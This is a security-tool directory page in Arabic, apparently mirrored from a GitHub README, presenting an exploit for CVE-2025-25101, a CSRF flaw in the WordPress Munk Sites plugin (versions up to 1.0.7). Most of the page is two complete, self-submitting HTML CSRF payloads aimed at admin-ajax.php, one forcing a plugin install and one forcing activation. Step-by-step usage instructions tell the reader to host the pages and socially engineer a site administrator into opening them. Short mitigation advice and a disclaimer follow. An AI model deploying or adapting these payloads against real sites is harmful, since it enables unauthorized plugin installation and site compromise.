Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-25101 — إضافة Munk Sites لووردبريس <= 1.0.7 - ثغرة CSRF لتثبيت إضافات تعسفي | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-25101
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتصيد الاحتياليالهندسة الاجتماعيةالتعلم والتعليم
GitHubnxploited/cve-2025-25101

CVE-2025-25101

إضافة Munk Sites لووردبريس <= 1.0.7 - ثغرة CSRF لتثبيت إضافات تعسفي

عرض المستودع
113منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚀 CVE-2025-25101 - إضافة Munk Sites لووردبريس <= 1.0.7 - CSRF لتثبيت إضافات عشوائية

📌 نظرة عامة

CVE-2025-25101 هي ثغرة تزوير الطلبات عبر المواقع (CSRF) في إضافة MetricThemes Munk Sites لـ WordPress (الإصدارات ≤ 1.0.7).
تسمح هذه الثغرة لمهاجم غير مصادَق بخداع مسؤول الموقع لتثبيت وتفعيل إضافات عشوائية، مما قد يؤدي إلى تنفيذ برمجيات عن بُعد (RCE) أو اختراق الموقع.

🛑 الإصدارات المتأثرة

  • إضافة Munk Sites <= 1.0.7
  • WordPress أي إصدار تكون فيه الإضافة مفعّلة

🛡️ التقييم الأمني (درجة CVSS)

الدرجةالخطورةالإصدارسلسلة المتجهات
9.6🔥 حرجة3.1CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

🔥 وصف الاستغلال

🛠️ كيف تعمل الثغرة:

تسمح ثغرة CSRF في إضافة Munk Sites للمهاجم بإجبار مسؤول WordPress مسجّل الدخول على تثبيت وتفعيل أي إضافة WordPress دون موافقته.
يتم ذلك عبر استغلال طلب admin-ajax.php غير محمي يفتقر إلى التحقق من رمز CSRF.

📌 سير عمل الاستغلال:

  1. ينشئ المهاجم صفحة ويب خبيثة تحتوي على حمولة CSRF.
  2. يزور الضحية (مسؤول WordPress) صفحة الويب الخاصة بالمهاجم.
  3. يرسل الاستغلال طلبات صامتة إلى WordPress لتثبيت وتفعيل إضافة عشوائية.
  4. يتم تثبيت الإضافة وتفعيلها دون أي تفاعل من المسؤول.

💻 كود الاستغلال

1️⃣ استغلال CSRF - تثبيت إضافة

تجبر هذه الحمولة الضحية على تثبيت إضافة hello-world.

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF Exploit - Plugin Installation</title>
    <style>
        body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
        h1 { color: #d9534f; } h2 { color: #5bc0de; }
        .output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
        .success { color: #5cb85c; font-weight: bold; }
    </style>
</head>
<body onload="document.forms[0].submit()">
    <h1>📌 CVE-2025-25101</h1>
    <h2>CSRF Exploit - Install 'Hello World' Plugin</h2>
    <h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
    <div class="output" id="output">🔄 Installing plugin...</div>
    <form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
        <input type="hidden" name="action" value="cs_install_plugin">
        <input type="hidden" name="plugin" value="hello-world">
    </form>
    <script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin installed successfully!</span>"; }, 5000);</script>
</body>
</html>

2️⃣ استغلال CSRF - تفعيل إضافة

تجبر هذه الحمولة الضحية على تفعيل إضافة hello-world.

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF Exploit - Plugin Activation</title>
    <style>
        body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
        h1 { color: #d9534f; } h2 { color: #f0ad4e; }
        .output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
        .success { color: #5cb85c; font-weight: bold; }
    </style>
</head>
<body onload="document.forms[0].submit()">
    <h1>📌 CVE-2025-25101</h1>
    <h2>CSRF Exploit - Activate 'Hello World' Plugin</h2>
    <h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
    <div class="output" id="output">🔄 Activating plugin...</div>
    <form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
        <input type="hidden" name="action" value="cs_active_plugin">
        <input type="hidden" name="plugin" value="hello-world">
    </form>
    <script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin activated successfully!</span>"; }, 5000);</script>
</body>
</html>

🔥 طريقة الاستخدام

  1. استضف ملفات HTML الخبيثة (install.html و activate.html) على خادم يتحكم به المهاجم.
  2. قم بهندسة اجتماعية لمسؤول WordPress لزيارة install.html.
  3. بمجرد تثبيت الإضافة، اخدعهم لزيارة activate.html.
  4. سيتم تثبيت وتفعيل إضافة hello-world دون موافقة المسؤول!

🚧 التخفيف

🔒 كيف تحمي موقع WordPress الخاص بك:

  • قم بترقية إضافة Munk Sites إلى أحدث إصدار (إذا كان التصحيح متاحًا).
  • استخدم إضافة أمان لـ WordPress مثل Wordfence أو Sucuri لمنع محاولات CSRF.
  • قيّد الوصول إلى admin-ajax.php باستخدام قواعد أمان في .htaccess أو إعدادات Nginx.
  • تأكد من أن المستخدمين المصادق عليهم والمصرح لهم فقط يمكنهم تثبيت الإضافات أو تفعيلها.
  • طبّق حماية CSRF باستخدام wp_nonce_field() و check_admin_referer().

📜 إخلاء مسؤولية

⚠️ هذا الاستغلال مخصص للأغراض التعليمية وبحوث الأمان فقط.
⚠️ الاستخدام غير المصرح به ضد الأنظمة دون إذن صريح غير قانوني.
⚠️ المؤلف غير مسؤول عن أي إساءة استخدام لهذا الكود.


⭐ الدعم والمساهمات

إذا وجدت هذا البحث قيّمًا، فلا تتردد في ⭐ إضافة نجمة للمستودع والمساهمة من خلال الإبلاغ عن ثغرات جديدة.

بواسطة: Nxploit | Khaled Alenazi

تنزيل الأداة